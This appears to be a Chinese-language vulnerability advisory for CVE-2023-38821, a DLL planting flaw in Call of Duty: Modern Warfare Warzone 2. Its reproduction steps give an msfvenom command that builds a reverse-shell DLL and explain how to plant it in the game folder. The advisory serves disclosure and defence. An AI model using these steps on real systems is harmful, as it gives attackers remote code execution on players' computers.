CoD-MW-Warzone-2 - CVE-2023-38821
使命召唤现代战争战区2中的DLL种植漏洞 - CVE-2023-38821
发现者: Idan Malihi
描述
动视《使命召唤:现代战争》战区v2中存在一个问题,允许本地攻击者通过精心构造的文件对UMPDC.dll、MSIMG32.dll、RTWorkQ.DLL、WINSTA.dll、CRYPTSP.dll、dnsapi.dll、MSASN1.dll、webio.dll、fwbase.dll、ncrypt.dll和DPAPI.DLL组件执行任意代码。
复现步骤
要利用该DLL种植漏洞,攻击者应执行以下步骤:
- 下载Steam。
- 下载并安装《使命召唤:现代战争2战区》。
- 打开安装路径文件夹,例如 D:\STEAM\steamapps\common\Call of Duty HQ。
- 在Kali Linux操作系统上使用msfvenom创建一个恶意DLL文件:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o RTWorkQ.DLL
- 将DLL文件传输到游戏路径 D:\STEAM\steamapps\common\Call of Duty HQ。
- 运行游戏并获取反向Shell。